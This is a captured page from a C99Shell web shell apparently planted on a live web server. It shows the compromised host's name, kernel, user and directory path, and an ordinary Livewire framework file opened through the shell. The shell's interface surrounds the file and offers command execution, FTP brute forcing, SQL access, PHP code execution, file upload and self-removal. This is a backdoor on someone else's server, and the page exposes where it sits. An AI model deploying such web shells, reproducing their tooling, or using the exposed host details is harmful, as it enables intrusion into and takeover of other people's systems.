!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/livewire/livewire/src/   drwxr-xr-x
Free 28.48 GB of 117.98 GB (24.14%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LivewireServiceProvider.php (5.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Livewire;
use 
Composer\InstalledVersions;
use 
Illuminate\Foundation\Console\AboutCommand;

class 
LivewireServiceProvider extends \Illuminate\Support\ServiceProvider
{
    public function 
register()
    {
        
$this->registerLivewireSingleton();
        
$this->registerConfig();
        
$this->bootEventBus();
        
$this->registerMechanisms();
    }

    public function 
boot()
    {
        
$this->bootMechanisms();
        
$this->bootFeatures();
    }

    protected function 
registerLivewireSingleton()
    {
        
$this->app->alias(LivewireManager::class, 'livewire');

        
$this->app->singleton(LivewireManager::class);

        
app('livewire')->setProvider($this);
    }

    protected function 
registerConfig()
    {
        
$config __DIR__.'/../config/livewire.php';

        
$this->publishes([$config => base_path('config/livewire.php')], ['livewire''livewire:config']);

        
$this->mergeConfigFrom($config'livewire');
    }

    protected function 
bootEventBus()
    {
        
app(\Livewire\EventBus::class)->boot();
    }

    protected function 
getMechanisms()
    {
        return [
            
\Livewire\Mechanisms\PersistentMiddleware\PersistentMiddleware::class,
            
\Livewire\Mechanisms\HandleComponents\HandleComponents::class,
            
\Livewire\Mechanisms\HandleRequests\HandleRequests::class,
            
\Livewire\Mechanisms\FrontendAssets\FrontendAssets::class,
            
\Livewire\Mechanisms\ExtendBlade\ExtendBlade::class,
            
\Livewire\Mechanisms\CompileLivewireTags\CompileLivewireTags::class,
            
\Livewire\Mechanisms\ComponentRegistry::class,
            
\Livewire\Mechanisms\RenderComponent::class,
            
\Livewire\Mechanisms\DataStore::class,
        ];
    }

    protected function 
registerMechanisms()
    {
        foreach (
$this->getMechanisms() as $mechanism) {
            
app($mechanism)->register();
        }
    }

    protected function 
bootMechanisms()
    {
        if (
class_exists(AboutCommand::class) && class_exists(InstalledVersions::class)) {
            
AboutCommand::add('Livewire', [
                
'Livewire' => InstalledVersions::getPrettyVersion('livewire/livewire'),
            ]);
        }

        foreach (
$this->getMechanisms() as $mechanism) {
            
app($mechanism)->boot();
        }
    }

    protected function 
bootFeatures()
    {
        foreach([
            
\Livewire\Features\SupportWireModelingNestedComponents\SupportWireModelingNestedComponents::class,
            
\Livewire\Features\SupportMultipleRootElementDetection\SupportMultipleRootElementDetection::class,
            
\Livewire\Features\SupportDisablingBackButtonCache\SupportDisablingBackButtonCache::class,
            
\Livewire\Features\SupportNestedComponentListeners\SupportNestedComponentListeners::class,
            
\Livewire\Features\SupportMorphAwareIfStatement\SupportMorphAwareIfStatement::class,
            
\Livewire\Features\SupportAutoInjectedAssets\SupportAutoInjectedAssets::class,
            
\Livewire\Features\SupportComputed\SupportLegacyComputedPropertySyntax::class,
            
\Livewire\Features\SupportNestingComponents\SupportNestingComponents::class,
            
\Livewire\Features\SupportScriptsAndAssets\SupportScriptsAndAssets::class,
            
\Livewire\Features\SupportBladeAttributes\SupportBladeAttributes::class,
            
\Livewire\Features\SupportConsoleCommands\SupportConsoleCommands::class,
            
\Livewire\Features\SupportPageComponents\SupportPageComponents::class,
            
\Livewire\Features\SupportReactiveProps\SupportReactiveProps::class,
            
\Livewire\Features\SupportFileDownloads\SupportFileDownloads::class,
            
\Livewire\Features\SupportJsEvaluation\SupportJsEvaluation::class,
            
\Livewire\Features\SupportQueryString\SupportQueryString::class,
            
\Livewire\Features\SupportFileUploads\SupportFileUploads::class,
            
\Livewire\Features\SupportTeleporting\SupportTeleporting::class,
            
\Livewire\Features\SupportLazyLoading\SupportLazyLoading::class,
            
\Livewire\Features\SupportFormObjects\SupportFormObjects::class,
            
\Livewire\Features\SupportAttributes\SupportAttributes::class,
            
\Livewire\Features\SupportPagination\SupportPagination::class,
            
\Livewire\Features\SupportValidation\SupportValidation::class,
            
\Livewire\Features\SupportIsolating\SupportIsolating::class,
            
\Livewire\Features\SupportRedirects\SupportRedirects::class,
            
\Livewire\Features\SupportStreaming\SupportStreaming::class,
            
\Livewire\Features\SupportNavigate\SupportNavigate::class,
            
\Livewire\Features\SupportEntangle\SupportEntangle::class,
            
\Livewire\Features\SupportLocales\SupportLocales::class,
            
\Livewire\Features\SupportTesting\SupportTesting::class,
            
\Livewire\Features\SupportModels\SupportModels::class,
            
\Livewire\Features\SupportEvents\SupportEvents::class,

            
// Some features we want to have priority over others...
            
\Livewire\Features\SupportLifecycleHooks\SupportLifecycleHooks::class,
            
\Livewire\Features\SupportLegacyModels\SupportLegacyModels::class,
            
\Livewire\Features\SupportWireables\SupportWireables::class,
        ] as 
$feature) {
            
app('livewire')->componentHook($feature);
        }

        
ComponentHookRegistry::boot();
    }
}



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0044 ]--